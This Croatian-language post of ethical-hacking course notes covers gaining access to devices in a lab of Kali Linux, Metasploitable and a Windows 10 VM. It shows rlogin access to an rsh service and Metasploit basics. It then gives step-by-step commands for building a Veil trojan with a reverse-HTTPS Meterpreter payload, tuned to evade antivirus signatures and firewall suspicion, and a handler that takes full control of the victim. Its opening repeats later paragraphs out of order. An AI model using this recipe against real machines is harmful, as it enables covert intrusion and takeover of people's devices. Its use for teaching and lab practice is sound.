7. Dobivanje pristupa (eng. Gaining access)
U ovoj kratkoj lekciji predavač opisuje načine na koji se može dobiti pristup nad uređajem. Uređaj u ovom slučaju može biti bilo koja naprava koja je spojena na internet (laptop, smart tv, mobitel...).
Prikupljanje informacija je prvi korak u server side napadima, ono nam koristi pri otkrivanju operativnog sustava, otvorenih portova, aplikacija koje koriste te portove. Prikupljaju se pomoću već ranije spomenutog alata Zenmap, sve što je potrebno je upisati IP adresu mete, a alat će vratiti željene informacije.
Za praćenje ove lekcije, potrebno je preuzeti Metasploitable operativni sustav čija je instalacija objašnjena unutar 2. poglavlja.
Predavač prikazuje informacije koje su rezultat skeniranja IP adrese na kojoj je instaliran Metasploitable operativni sustav. Tamo obraća pažnju polaznicima na otvorene portove i aplikacije koje ih koriste. Za primjer uzima port 512 koji korisiti aplikaciju netkit-rsh (Slika 1.).
Jednostavnom Google pretragom mogu se otkriti informacije o toj aplikaciji i postoje li greške koje se mogu iskorisiti protiv nje. U ovom slučaju to je SSH klijent kojeg je potrebno instalirati na Kali Linux pomoću "apt-get" naredbe. Tada se može koristiti aplikacija za spajanje na metu pomoću narebe "rlogin [-l user] host" (Slika 2), što će odobriti pristup napadaču za potpunu kontrolu nad uređajem.
Metasploit je alat unaprijed instaliran na Kali Linux-u koji se koristi za izradu i pokretanje napada na te slabosti. Također se može koristiti za skeniranje portova, identificiranje servisa itd. Neke od naredbi su:
Oni zahtjevaju korisničku interakciju koja se sastoji od instaliranja ažuriranja, programa ili npr otvaranja slike, na taj način napadač može potajno ubaciti svoj virus u uređaj od mete. Zahtjevaju puno iscrpnije prikupljanje informacija, što bi značilo da uz sve informacije koje se prikupljaju za server side napad, također se prikupljaju informacije o samom korisniku, koje stranice posjećuje, sa kojim ljudima kontaktira itd.
Za ovo poglavlje predavač ćekoristiti Windows 10 na virutalnoj mašini kao metu, a Kali Linux kao napadački uređaj.
Nije uključen u Kali Linux instalaciju već ga je potrebno preuzeti sa github-a. Što se u Linux-u izvršava naredbom "git clone https://github.com/Veil-Framework/Veil.git" koja će preuzeti željeni alat u direktorij.
Instalacija se pokreće iz config direktorija unutar glavnog Veil direktorija sa naredbom "./setup.sh" što će preuzeti sve aplikacije i knjižnice (eng. libraries) koje su potrebne za ispravan rad Veil-a.
Za pokretanje potrebno se nalaziti u direktoriju gdje je Veil raspakiran te jednostavno upisati naredbu "./Veil.py".
U nastavku su polaznici upoznati sa alatom na način da predavač započne korake za izradu prvog trojan virusa.
S time na umu, pokreće se ranije spominjan Metasploit sa naredbom "msfconsole".
Kada meta pokrene virus, automatski se spaja na Metasploit konzolu u kojoj tada napadač ima potpunu kontrolu.
- Server side napadi
- Ne zahtjeva interakciju od korisnika, koristi se uglavnom za napade na servere koji rade na automatizirani način. Sve što je potrebno za napad je poznavanje IP adrese mete. Koristi nedostatke u operativnim sustavima kako bi omogućila pristup napadaču.
- Client side napadi
- Zahtjeva od korisnika napadnutog uređaja napravi nešto. Odnosno pristane na instaliranje ažuriranja, otvaranje slike, otvaranje .exe datoteke ili nešto slično. Tada se na njegov uređaj instalira trojan virus, iliti stražnji ulaz (eng. backdoor) kojeg napadač može koristiti za dobivanje pristupa nad uređajem.
7.1. Server side napadi
Najčešće se koriste nad web serverima i serverima općenito, zbog toga što su osobna računala uglavnom skrivena iza rutera, stoga je prikupljanje informacija za takve uređaje nemoguće pošto nemaju vlastitu IP adresu.Prikupljanje informacija je prvi korak u server side napadima, ono nam koristi pri otkrivanju operativnog sustava, otvorenih portova, aplikacija koje koriste te portove. Prikupljaju se pomoću već ranije spomenutog alata Zenmap, sve što je potrebno je upisati IP adresu mete, a alat će vratiti željene informacije.
Za praćenje ove lekcije, potrebno je preuzeti Metasploitable operativni sustav čija je instalacija objašnjena unutar 2. poglavlja.
Predavač prikazuje informacije koje su rezultat skeniranja IP adrese na kojoj je instaliran Metasploitable operativni sustav. Tamo obraća pažnju polaznicima na otvorene portove i aplikacije koje ih koriste. Za primjer uzima port 512 koji korisiti aplikaciju netkit-rsh (Slika 1.).
Slika 1. |
Jednostavnom Google pretragom mogu se otkriti informacije o toj aplikaciji i postoje li greške koje se mogu iskorisiti protiv nje. U ovom slučaju to je SSH klijent kojeg je potrebno instalirati na Kali Linux pomoću "apt-get" naredbe. Tada se može koristiti aplikacija za spajanje na metu pomoću narebe "rlogin [-l user] host" (Slika 2), što će odobriti pristup napadaču za potpunu kontrolu nad uređajem.
Slika 2. |
7.1.2. Stražnji ulaz (eng. backdoor)
Stražnji ulaz je ponekad namjerno ubačen u aplikaciju kako bi dopustio udaljenom računalu spajanje na uređaj. Neki od tih stražnjih ulaza imaju slabosti koji se može iskoristiti za neovlašteno spajanje na uređaj.Metasploit je alat unaprijed instaliran na Kali Linux-u koji se koristi za izradu i pokretanje napada na te slabosti. Također se može koristiti za skeniranje portova, identificiranje servisa itd. Neke od naredbi su:
- msfconsole : pokreće alat
- help : prikazuje upute
- show [something] : prikazuje informacije o napadu (eng. exploit)
- use [something] : označuje koji će se napad koristiti
- set [option] [value] : za promjenu opcija unutar alata, recimo "set ip 127.0.0.1"
- exploit : pokreće napad
Slika 3. |
7.2 Client side napadi
Ukoliko server side napad nije uspješan zbog nekog razloga, kao recimo da meta nema vlastitu IP adresu već je iza rutera ili na sustavu nema slabosti koje server side napad može iskoristiti, tada se koriste client side napadi.Oni zahtjevaju korisničku interakciju koja se sastoji od instaliranja ažuriranja, programa ili npr otvaranja slike, na taj način napadač može potajno ubaciti svoj virus u uređaj od mete. Zahtjevaju puno iscrpnije prikupljanje informacija, što bi značilo da uz sve informacije koje se prikupljaju za server side napad, također se prikupljaju informacije o samom korisniku, koje stranice posjećuje, sa kojim ljudima kontaktira itd.
Za ovo poglavlje predavač ćekoristiti Windows 10 na virutalnoj mašini kao metu, a Kali Linux kao napadački uređaj.
7.2.1. Veil alat
Služi za izradu prilagođenih stražnjih ulaza odnosno trojan virusa, koje po mogućnosti anti virus program ne prepoznaje kao prijetnju.Nije uključen u Kali Linux instalaciju već ga je potrebno preuzeti sa github-a. Što se u Linux-u izvršava naredbom "git clone https://github.com/Veil-Framework/Veil.git" koja će preuzeti željeni alat u direktorij.
Instalacija se pokreće iz config direktorija unutar glavnog Veil direktorija sa naredbom "./setup.sh" što će preuzeti sve aplikacije i knjižnice (eng. libraries) koje su potrebne za ispravan rad Veil-a.
Za pokretanje potrebno se nalaziti u direktoriju gdje je Veil raspakiran te jednostavno upisati naredbu "./Veil.py".
U nastavku su polaznici upoznati sa alatom na način da predavač započne korake za izradu prvog trojan virusa.
- list - naredba koja otkriva da Veil ima dva glavna alata
- 1) Evasion - genenrira trojan virus
- 2) Ordnance - generira djelove koda (eng. payloads) za trojan virus
- use 1 - za korištenje Evasion-a
- list - prikazuje listu payloads-a
- Svaki je zapisan u sljedećem obliku: [programski jezik]/[tip payload-a]/[ime payload-a]
- Za primjer koristit će se: "15) go/meterpreter/rev_https.py"
- use 15 - za odabir payload-a što će prikazati opcije koje treba postaviti
- set LHOST [IP] - gdje je IP adresa uređaja napadača, na koju će se meta spojiti nakon što pokrene virus
- set LPORT 8080 - kako promet nebi izgledao sumnjivo meti ni njegovom vatrozidu (eng. firewall) pošto se koristi kao web port kao i 80
- Potrebno je izmjeniti što više opcija iz razloga što anti virus programi uspoređuju potpis svake datoteke koju skeniraju sa velikom bazom potpisa od ponzatih virusa. Ukoliko potpis datoteke ne odgovara ni jednom od njih, dopušta se izvođenje na računalu.
- set PROCESSORS 1 - kako bi potpis izgledao drugačije
- set SLEEP 6
- generate - izrada virusa, traži unos naziva, može biti bilo koji
7.2.2. Slušanje dolazećih veza (eng. Listening to incoming connections)
Potrebno je otvoriti port kako bi se virus sa uređaja mete mogao spojiti na napadačevo računalo. Za primjer izrade virusa je korišten port 8080 koji sada treba otvoriti i payload "go/meterpreter/rev_https.py".S time na umu, pokreće se ranije spominjan Metasploit sa naredbom "msfconsole".
- use exploit/multi/handler - modul koji se koristi za slušanje dolazećih veza
- show options - opcije koje je moguće postaviit za modul
- set PAYLOAD windows/meterpreter/rev_https - postavljanje payload-a da odgovara payload-u virusa
- set LHOST [ip] - gdje je IP adresa uređaja napadača, na koju će se meta spojiti nakon što pokrene virus
- set LPORT 8080 - port koji se koristio za izradu virusa
- exploit - Metasploit sada čeka nadolezeće veze dok meta ne pokrene virus
Kada meta pokrene virus, automatski se spaja na Metasploit konzolu u kojoj tada napadač ima potpunu kontrolu.
Primjedbe
Objavi komentar